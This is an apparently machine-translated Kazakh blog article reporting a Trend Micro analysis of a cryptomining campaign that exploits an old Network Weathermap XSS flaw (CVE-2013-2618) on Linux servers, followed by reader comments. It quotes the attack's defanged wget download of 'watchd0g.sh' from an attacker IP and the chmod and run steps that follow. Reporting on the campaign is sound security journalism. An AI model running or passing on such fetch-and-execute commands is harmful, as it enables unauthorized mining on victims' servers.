5 жылдық Linux ақаулығы шабуылдаушыларға криптовалюталарды өндіруге мүмкіндік береді

Linux апаты

Бұл крипто-валюта өндірушісі қашықтағы компьютерлерді қолдана отырып авторизациясыз бұлардың иелерінің трендке айналуы. Мен бұған дейін бірнеше рет блогта осы жағдай туралы айтқан болатынмын.

Бұл криптовалюталар пайда болған сәттен бастап мүлдем бақылаудан шығып кетті айтарлықтай орын мен құндылықты иеленді, қауіпсіздігін бұзатын компьютерлерге кіру үшін жеткілікті білімі бар адамдар ақшалай пайда алу үшін маңызды ақпаратты немесе банктік шоттарды іздеумен уақытты ысыраптады.

Мұны істеудің орнына олар осы командаларды бақылауда ұстап, оларды тау-кен желісіне біріктірудегі ең қарапайым нәрсені, сондай-ақ олар әдетте ботнетпен жасайтын басқа да тапсырмаларды таңдайды.

Осылайша сіздің нөміріңізді өзгерту көбінесе, олар тек осы пайда болатын жедел ақшаға назар аударады.

Нарықтық трендтерді ақылды түрде түсініп, крипто-сауда туралы дұрыс біле отырып, үлкен пайда табуға болады.

Linux шынымен қауіпсіз жүйе ме?

Біздің көпшілігімізде Linux-дің қорғалған қауіпсіз операциялық жүйесі деген шындық бар, оның әлі де кейбір кемшіліктері бар.

Жақсыбірнеше күндері TrendMicro жаңалық ашты, Онда анықталды жаңа Linux жүйелеріндегі ақаулар хакерлерге тау-кен криптовалюталарына артықшылық берді Linux серверлері мен машиналарын пайдалану.

Сіздің блогыңыз арқылы жасалған мәлімдемеде олар келесіге түсініктеме берді:

Оқиғаларды жоюға байланысты біздің мониторингіміз арқылы біз индикаторлық әрекеттерді байқадық, олардың көрсеткіштері біз JenkinsMiner зиянды бағдарламасын қолданған криптовалюта өндірісінің алдыңғы науқанымен байланысты болды.

Айырмашылық: бұл науқан Linux серверлеріне бағытталған. Бұл сондай-ақ қауіпсіздіктің ескірген ақауларын пайдаланып, қайта қолданылған осалдықтардың классикалық жағдайы, оның жамауына бес жылдай уақыт болды.

Сіздің талдауыңыз арқылы осы шығарылымда зардап шеккен сайттарды анықтай алды бұл сәтсіздік үшін Бұл көбінесе Жапония, Тайвань, Қытай, АҚШ және Үндістанға әсер етеді.

Шабуылды талдау

Талдау арқылы Trend Micro Smart Protection Network компаниясы шабуылдаушылар осы кемшілікті қалай пайдаланатыны туралы біраз егжей-тегжейлі:

Осы науқанның операторлары Camapi Network Weathermap плагиніндегі белгіленген осалдығы бар CVE-2013-2618-ді пайдаланды, оны жүйенің әкімшілері желілік әрекеттерді бейнелейді.

Неліктен олар қауіпсіздіктің ескі ақауларын пайдаланады дегенге келер болсақ: Network Weathermap-да 2014 жылдың маусым айынан бастап осы уақытқа дейін тек екі ғана осалдық бар.

Бұл шабуылдаушылар эксплуатация мүмкін болатын қауіпсіздік ақауларын ғана емес, сонымен қатар ашық бастапқы құралды қолданатын ұйымдарда патчтың кешігуін де пайдалануы мүмкін.

Негізінен шабуыл XSS шабуыл арқылы жасалады:

ауа райы картасы-криптоминер-4

Бұлыңғыр бөлігі - бұл шабуыл мақсаты, порт бар веб-сервер.

Файл /plugins/weathermap/configs/conn.php - бұл тұрақты XSS шабуылынан туындайтын файл / плагиндер / ауа райы картасы / php .

Сонымен қатар қосылым Бастапқыда біз ұқсас HTTP сұрауын параққа қолданылғанын көреміз ' cools.php '.

Криптовалюта бойынша тау-кен бағдарламасы осалдық арқылы таратылады PHP ауа-райы картасында Linux серверлері болып табылатын нысандар туралы

Суретте сіз шабуылдың қалай жасалатынын көре аласыз және ол келесідей сипатталады:

wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh

Ол wget файлын жүктеуге нұсқау жібереді, бұл барлық Linux дистрибутивтері әдепкі бойынша орнатқан утилита.

chmod 775 watchd0g.sh

файлды орындалатын етеді

./watchd0g.sh

Сайып келгенде, бұл файлды серверде іске қосу.

Бақытымызға орай, қазірдің өзінде патч бар ( CVE-2013-2618 ) ақаулық үшін қол жетімді және Сіз оны жүктей аласыз бастап бұл сілтеме

Si сіз бұл туралы көбірек білгіңіз келеді осы сәтсіздікке сіз осы сілтемеге кіре аласыз.

Дерек көзі: PHP ауа-райы картасы арқылы таратылатын криптовалюта өндірушісі, Linux серверлеріне бағытталған


Мақаланың мазмұны біздің ұстанымдарымызды ұстанады редакторлық этика. Қате туралы хабарлау үшін нұқыңыз Мұнда.

5 пікір, өз пікіріңізді қалдырыңыз

Пікіріңізді қалдырыңыз

Сіздің электрондық пошта мекен-жайы емес жарияланады. Міндетті өрістер таңбаланған *

*

*

  1. Деректерге жауапты: Мигель Анхель Гатан
  2. Деректердің мақсаты: СПАМ-ны басқару, түсініктемелерді басқару.
  3. Заңдылық: Сіздің келісіміңіз
  4. Деректер туралы ақпарат: заңды міндеттемелерді қоспағанда, деректер үшінші тұлғаларға жіберілмейді.
  5. Деректерді сақтау: Occentus Networks (ЕО) орналастырған мәліметтер базасы
  6. Құқықтар: Сіз кез-келген уақытта ақпаратты шектей, қалпына келтіре және жоя аласыз.

  1.   Мигель Майол и Тур дижо

    Ақымақ болу қауіпті емес, бірақ оған қарамастан Linux сізді құтқарады.
    Қауіпсіздік патчтарын жаңартпау Linux үшін кінәлі емес. Ақшаны үнемдеу үшін кейбір компаниялардың кінәсі - жүйелік әкімші ретінде ақымақтарды жалдау,
    Бірақ солай бола тұрса да, ол дереу анықталып, бірден шешіледі, тіпті қауіпсіздікке қатысты кез-келген оқиғалар да жарияланады.

  2.   Мен элдеколетас сияқты вилла алғым келеді дижо

    Linux-те оның жаңартулары қолданылмауында қандай кінә бар? GNU / Linux әзірлеушілері өз жұмыстарын туындайтын осалдықтарға арналған шешімдерді әзірлеу және оларды пайдаланушыларға қол жетімді ету арқылы жасайды. Егер дәрігер сізге тұмауға қарсы вакцина тағайындаса және сіз оны қабылдамасаңыз, сіз ауырып, қатып қаласыз ... дәрігерге кінәлі ме?

  3.   Гильермо дижо

    Linux бұрынғыдай болмағандықтан, қатарынан екі жаңалық пайда болды:
    1.- Жақсырақ редакторларға ақысыз бағдарламалық жасақтама ұсынылады, ал басқаларын ұмытып кетеді (олар түсініктемелерде келтірілген).
    2.- Вирустар тек жаңартылмаған серверлерге әсер ететін керемет жаңалықтар. Бірақ егер кез-келген Linux бірнеше ондаған жылдар бойы әдепкі бойынша жаңартылса. Windows стиліндегі сорғыш антивирус керек сияқты қорқынышты қою. Олар Linux-мен Windows-пен бірдей, ал олай емес деп айтуға тырысатын сияқты.
    Егер қате ескі болса және алдын-ала жамылған болса, бұл жаңалық та емес, ештеңе де емес. Microsoft және Trend Micro, Norton, Panda немесе McAffee сияқты антивирустық компанияларды ойнамаңыз немесе жалақы алмаңыз.
    Айтпақшы, біз бірнеше жыл бойы компанияда Trend Micro-ны қолдандық және бұл нағыз картоп, қоқыс еді, өйткені оның жүйесінде орындалатын бағдарламада вирустардың «іздері» бар екендігі айтылған (вирус болмаса да, вирус болуы мүмкін) және неге ол оны алып тастады (оны іске қоспау үшін каталогқа апарды), оны пайдалануға рұқсат бермеді және бұл әрекетті біз қауіпсіз пайдаланылатын файлмен бұғаттан шығаратын ақ тізім жоқ еді. Бок. Бұл корпоративті нұсқа, жеке нұсқада бұл ақ тізімге ену мүмкіндігі болды. Аянышты.

  4.   Гильермо дижо

    Өзіңізді соншалықты талғампаздықпен сипаттамаңыз.
    Мақалада бағдарламаға кіруге, оны орындауға және іске қосуға мүмкіндік беретін қауіпсіздік тесігі туралы айтылады, бұл кез-келген вирустың таралуы қажет қауіпсіздік тесігі, бұл вирус болуы керек, егер ол бағдарламаға өз кодында болуы керек болса операцияны қайталау және өздігінен көшіру үшін желідегі компьютерлерді сканерлеңіз. Олар мұны дәл істемейді, өйткені Linux-та ашылған қауіпсіздік саңылаулары қауіпсіздік патчымен жабылған, сондықтан мен Windows пен Linux арасындағы айырмашылықты айтқым келеді, өйткені антивирус қажет емес, тесікті жабу керек. Windows-та бірнеше себептермен қиынырақ болады: 1. - Файлдар кеңейтілгендіктен, орындалатын файлға айналуы мүмкін, сондықтан оларды компьютерге енгізу қадамы жойылады. 2.- Пайдаланушылар шығу тегі күмәнді бағдарламаларды үнемі орнатып отырады, өйткені олар меншіктік және оларды төлемсіз алу қажет (мен MS Office, Photoshop сатып алу, үй шаруашылығында ... компьютерлік техниканың құнын екі еседен артық көтеру туралы ештеңе айтпаймын). 3.- Ерте ме, кеш пе Windows бұзылады, пайдаланушы оны көршісіне, досына апарады ... уақытты жоғалтпау үшін бәрін форматтайды және соңғы Windows-ты жаңартылмаған немесе патч өзі қоятын активация патчымен орнатады. тыңшылық бағдарламасы. Мүмкін ол олай емес және ол керемет болуы мүмкін, бірақ ол сізде болуы мүмкін және сізде парольдеріңізді тыңшылық ететін Windows бар. Мақалада олар осалдыққа ұшыраған Linux жүйесіндегі енгізу жүйесін еске түсіреді, желіні автоматты түрде сканерлейтін және оны көшіруге және серверде жұмыс істеуге қолданатын бағдарламаны бәрінен де оңай, сол себепті айтқан. мақалада кез-келген вирус үшін ең маңызды қадам болып табылады: жүйенің шабуыл жасау осалдығын білу.

  5.   гамбуро дижо

    Нашар ақпарат. Бұл Linux-тағы қате емес, бұл PHP APPLICATION-тағы қате, яғни мультиплатформа. Бұл Linux ядросымен жұмыс жасайтын жүйелер үшін ерекше емес! Егер қосымша кросс-платформа болмаса да, бұл Linux қатесі болмас еді, бұл жай ғана қосымша болар еді.

    Linux ядросында сценарийлердің сайт аралық шабуылдарынан осыған ұқсас қорғанысқа ешқандай кедергі жоқ. Ең болмағанда жарияламас бұрын БЕС МИНУТТЫ зерттеңіз, өйткені бірдеңе туралы аздап білетін адамға сіз жаман болып көрінесіз.